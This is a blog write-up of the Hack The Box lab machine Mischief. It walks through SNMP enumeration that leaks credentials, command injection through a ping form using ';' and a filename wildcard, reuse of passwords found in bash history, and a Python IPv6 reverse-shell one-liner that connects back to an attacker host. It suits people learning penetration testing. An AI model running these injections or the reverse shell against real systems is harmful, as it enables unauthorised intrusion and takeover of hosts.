jebidiah-anthony

write-ups and what not

HTB Mischief (10.10.10.92) MACHINE WRITE-UP


TABLE OF CONTENTS


PART 1 : INITIAL RECON

$ nmap --min-rate 1000 -p- -sT -sU -v 10.10.10.92

  22/tcp   open  ssh
  3366/tcp open  creativepartnr
  161/udp  open  snmp

$ nmap -oN mischief -p 22,161,3366 -sC -sT -sU -sV -v 10.10.10.92

  22/tcp   open          ssh            OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
  | ssh-hostkey:
  |   2048 2a:90:a6:b1:e6:33:85:07:15:b2:ee:a7:b9:46:77:52 (RSA)
  |   256 d0:d7:00:7c:3b:b0:a6:32:b2:29:17:8d:69:a6:84:3f (ECDSA)
  |_  256 3f:1c:77:93:5c:c0:6c:ea:26:f4:bb:6c:59:e9:7c:b0 (ED25519)
  3366/tcp open          caldav         Radicale calendar and contacts server (Python BaseHTTPServer)
  | http-auth:
  | HTTP/1.0 401 Unauthorizedx0D
  |_  Basic realm=Test
  | http-methods:
  |_  Supported Methods: GET HEAD
  |_http-server-header: SimpleHTTP/0.6 Python/2.7.15rc1
  |_http-title: Site doesn't have a title (text/html).
  161/udp  open          snmp           SNMPv1 server; net-snmp SNMPv3 server (public)
  | snmp-info:
  |   enterprise: net-snmp
  |   engineIDFormat: unknown
  |   engineIDData: b6a9f84e18fef95a00000000
  |   snmpEngineBoots: 19
  |_  snmpEngineTime: 59m39s
  | snmp-interfaces:
  |   lo
  |     IP address: 127.0.0.1  Netmask: 255.0.0.0
  |     Type: softwareLoopback  Speed: 10 Mbps
  |     Status: up
  |     Traffic stats: 0.67 Kb sent, 0.67 Kb received
  |   Intel Corporation 82545EM Gigabit Ethernet Controller (Copper)
  |     IP address: 10.10.10.92  Netmask: 255.255.255.0
  |     MAC address: 00:50:56:b9:2c:07 (VMware)
  |     Type: ethernetCsmacd  Speed: 1 Gbps
  |     Status: up
  |_    Traffic stats: 618.08 Kb sent, 23.39 Mb received
  | snmp-netstat:
  |   TCP  0.0.0.0:22           0.0.0.0:0
  |   TCP  0.0.0.0:3366         0.0.0.0:0
  |   TCP  10.10.10.92:22       10.10.14.213:32850
  |   TCP  10.10.10.92:22       10.10.14.213:32864
  |   TCP  10.10.10.92:22       10.10.15.54:40920
  |   TCP  10.10.10.92:22       10.10.16.63:40704
  |   TCP  10.10.10.92:3366     10.10.14.213:47812
  |   TCP  10.10.10.92:3366     10.10.14.213:47814
  |   TCP  10.10.10.92:3366     10.10.14.213:47816
  |   TCP  10.10.10.92:3366     10.10.14.213:47818
  |   TCP  10.10.10.92:3366     10.10.14.213:47820
  |   TCP  127.0.0.1:3306       0.0.0.0:0
  |   TCP  127.0.0.53:53        0.0.0.0:0
  |   UDP  0.0.0.0:161          *:*
  |   UDP  0.0.0.0:34424        *:*
  |_  UDP  127.0.0.53:53        *:*
  | snmp-sysdescr: Linux Mischief 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64
  |_  System uptime: 59m39.09s (357909 timeticks)
  |_snmp-win32-software:
  Service Info: Host: Mischief; OS: Linux; CPE: cpe:/o:linux:linux_kernel

NOTE(S):

  • An SNMP service is running at UDP PORT 161.
  • The web service running on TCP PORT 3366 is served using a Python BaseHTTPServer.

PART 2 : PORT ENUMERATION

UDP PORT 161 (snmp)

  • snmpwalk:
    $ snmpwalk -c public 10.10.10.92 -v 2c
    
      iso.3.6.1.2.1.1.1.0 = STRING: "Linux Mischief 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64"
      iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
      iso.3.6.1.2.1.1.3.0 = Timeticks: (4642890) 12:53:48.90
      iso.3.6.1.2.1.1.4.0 = STRING: "Me "
      iso.3.6.1.2.1.1.5.0 = STRING: "Mischief"
      iso.3.6.1.2.1.1.6.0 = STRING: "Sitting on the Dock of the Bay"
      ...omitted...
    
    

    NOTE(S):

    • Processes (hrSWRunEntry):
        iso.3.6.1.2.1.25.4.2.1.4.608 = STRING: "python"
        ...omitted...
        iso.3.6.1.2.1.25.4.2.1.5.608 = STRING: "-m SimpleHTTPAuthServer 3366 loki:godofmischiefisloki --dir /home/loki/hosted/"
        ...omitted...
      
      • The process for the hosted webservice is found.
      • HTTP Authentication credentials are found - loki : godofmischiefisloki
      • The web service is hosted from /home/loki/hosted
    • IPv6 Addresses (ipAddressIfIndex):
      $ snmpwalk -c public -v 2c 10.10.10.92 iso.3.6.1.2.1.4.34.1.3.2.16
      
        iso.3.6.1.2.1.4.34.1.3.2.16.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1 = INTEGER: 1
        iso.3.6.1.2.1.4.34.1.3.2.16.222.173.190.239.0.0.0.0.2.80.86.255.254.185.245.54 = INTEGER: 2
        iso.3.6.1.2.1.4.34.1.3.2.16.254.128.0.0.0.0.0.0.2.80.86.255.254.185.245.54 = INTEGER: 2
      
      
      • The 1st one is the Loopback Address.
      • The 2ns one is the Unique-Local Address.
      • The 3rd one is the Link Local Address.
    • Evaluate the IPv6 address of the system:
      unique_local_oid=$(snmpwalk -c public -v 2c 10.10.10.92 iso.3.6.1.2.1.4.34.1.3.2.16.222 | sed -ne 's/^.*\(222.*\) =.*$/\1/p')
      
      unique_local_dec=$(echo $unique_local_oid | tr '.' ' ')
      
      unique_local_hex=$(printf '%02x' $unique_local_dec)
       
      ipv6=$(echo -n $unique_local_hex | fold -w4 | tr '\n' ':')
      
      $ echo $ipv6
      
        dead:beef:0000:0000:0250:56ff:fea4:29f2
      
      
    • See if there are other ports open for IPv6:
      $ nmap -6 --min-rate 1000 -p- -v dead:beef:0000:0000:0250:56ff:fea4:29f2
            
        22/tcp   open     ssh
        80/tcp   open     http
      
      $ nmap -6 -p22,80 -sC -sV -v $ipv6
      
        22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
        | ssh-hostkey:
        |   2048 2a:90:a6:b1:e6:33:85:07:15:b2:ee:a7:b9:46:77:52 (RSA)
        |   256 d0:d7:00:7c:3b:b0:a6:32:b2:29:17:8d:69:a6:84:3f (ECDSA)
        |_  256 3f:1c:77:93:5c:c0:6c:ea:26:f4:bb:6c:59:e9:7c:b0 (ED25519)
        80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
        |_http-server-header: Apache/2.4.29 (Ubuntu)
        |_http-title: 400 Bad Request
        Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
      
      
      • There is another http service open using IPv6.

TCP PORT 3366 (http, IPv4)

  • http://10.10.10.136:

    3366 Basic Auth

    NOTE(S):

    • The credentials were found during the SNMP enumeration.
  • Logging in using loki : godofmischiefisloki:

    3366 Authenticated

    NOTE(S):

    • Two sets of credentials are found:

      Username Password
      loki godofmischiefisloki
      loki trickeryanddeceit

TCP PORT 80 (http, IPv6)

  • http://[dead:beef:0000:0000:0250:56ff:fea4:29f2]/

    80 Landing Page

  • Attempt Logging in using the credentials found on PORT 3366

    80 Command Execution

    NOTE(S):

    • The credential pair, administrator : trickeryanddeceit, worked.
    • So far, only the ping command could be executed.
    • In my home directory, i have my password in a file called credentials, Mr Admin

PART 3 : EXPLOITATION

  • Bypass the command execution in the service running on port 80:
    $ ping -c 2 127.0.0.1; id
        
      PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
      64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.020 ms
      64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.061 ms
    
      --- 127.0.0.1 ping statistics ---
      2 packets transmitted, 2 received, 0% packet loss, time 1028ms
      rtt min/avg/max/mdev = 0.020/0.040/0.061/0.021 ms
      Command was executed succesfully!
    
    $ id; ping -c 2 127.0.0.1
        
      uid=33(www-data) gid=33(www-data) groups=33(www-data)
      Command was executed succesfully!
    
    

    NOTE(S):

    • The command execution could be bypassed by using a ;.
    • The first command is the only one being executed

PART 4 : GENERATE USER SHELL

  • Take the file called credentials from the home directory:
    $ echo /home/*; ping -c 2 127.0.0.1
    
      /home/loki
      Command was executed succesfully!
    
    $ echo /home/loki/*; ping -c 2 127.0.0.1
     
      /home/loki/credentials /home/loki/hosted /home/loki/user.txt
      Command was executed succesfully!
    
    $ cat /home/loki/credentials; ping -c 2 127.0.0.1
    
      Command is not allowed.
    
    $ cat /home/loki/cred*; ping -c 2 127.0.0.1
    
      pass: lokiisthebestnorsegod
      Command was executed succesfully!
    
    

    NOTE(S):

    • The word credentials is being filtered out by the service.
    • It was bypassed by using a wildcard.
  • Login via ssh:
    $ ssh -l loki 10.10.10.92
      The authenticity of host '10.10.10.92 (10.10.10.92)' can't be established.
      ECDSA key fingerprint is SHA256:deaxXTK7ORthfGcKdblPRUmgNrU20oclqMbwVj3hzYI.
      Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
      Warning: Permanently added '10.10.10.92' (ECDSA) to the list of known hosts.
    $ [email protected]'s password: lokiisthebestnorsegod
      
    $ cat user.txt
    
      bf58........................0060
    
    

PART 5.1 : PRIVILEGE ESCALATION (loki -> root)

  • Check for interesting files in loki’s home directory:
    $ ls -lah ~
        
      -rw------- 1 loki loki  192 Jul 14  2018 .bash_history
      ...omitted...
      -rw-rw-r-- 1 loki loki   28 May 17  2018 credentials
      ...omitted...
      -rw-r--r-- 1 loki loki    0 May 14  2018 .sudo_as_admin_successful
      -r-------- 1 loki loki   33 May 17  2018 user.txt
      ...omitted...
    
    $ cat .bash_history
       
      python -m SimpleHTTPAuthServer loki:lokipasswordmischieftrickery
      ...omitted...
      sudo su
      su
      exit
      su root
      ...omitted...
      exit
    
    

    NOTE(S):

    • There was an attempt to execute su root in the .bash_history.
    • There is a .sudo_as_admin_successful which might mean the attempt was successful.
    • A previously unknown credential pair was used to initialize the python simpleHTTPAuthServer.
      • This might be a lead for the root password.
  • Attempt to execute su root:
    $ su root
     
      -bash: /bin/su: Permission denied
    
    
  • Check privileges for the su command:
    $ getfacl -R -s / 2>/dev/null | grep -A 9 su
        
      # file: usr/bin/sudo
      # owner: root
      # group: root
      # flags: s--
      user::rwx
      user:loki:r--
      group::r-x
      mask::r-x
      other::r-x
    
      # file: bin/su
      # owner: root
      # group: root
      # flags: s--
      user::rwx
      user:loki:r--
      group::r-x
      mask::r-x
      other::r-x
      
    

    NOTE(S):

    • The user, loki, only has read (r--) permissions for both su and sudo
    • Good thing we still have access to another user – www-data

PART 5.2 : PRIVILEGE ESCALATION (www-data -> root)

  • Set-up a listener for IPv6:
    $ socat TCP6-LISTEN:4444 stdout
    
  • Execute an IPv6 reverse shell on the web service running on port 80:
    $ python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::100e",4444,0,0));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'; ping -c 2 127.0.0.1
    
  • While inside the reverse shell:
    $ id 
    
      uid=33(www-data) gid=33(www-data) groups=33(www-data)
    
    $ su
    $ Password: lokipasswordmischieftrickery
    
    $ id
       
      uid=0(root) gid=0(root) groups=0(root)
    
    $ cat /root/root.txt
    
      The flag is not here, get a shell to find it!
    
    $ find / -name root.txt -type f -uid 0
    
      /usr/lib/gcc/x86_64-linux-gnu/7/root.txt
      /root/root.txt
    
    $ cat /usr/lib/gcc/x86_64-linux-gnu/7/root.txt
    
      ae15........................7807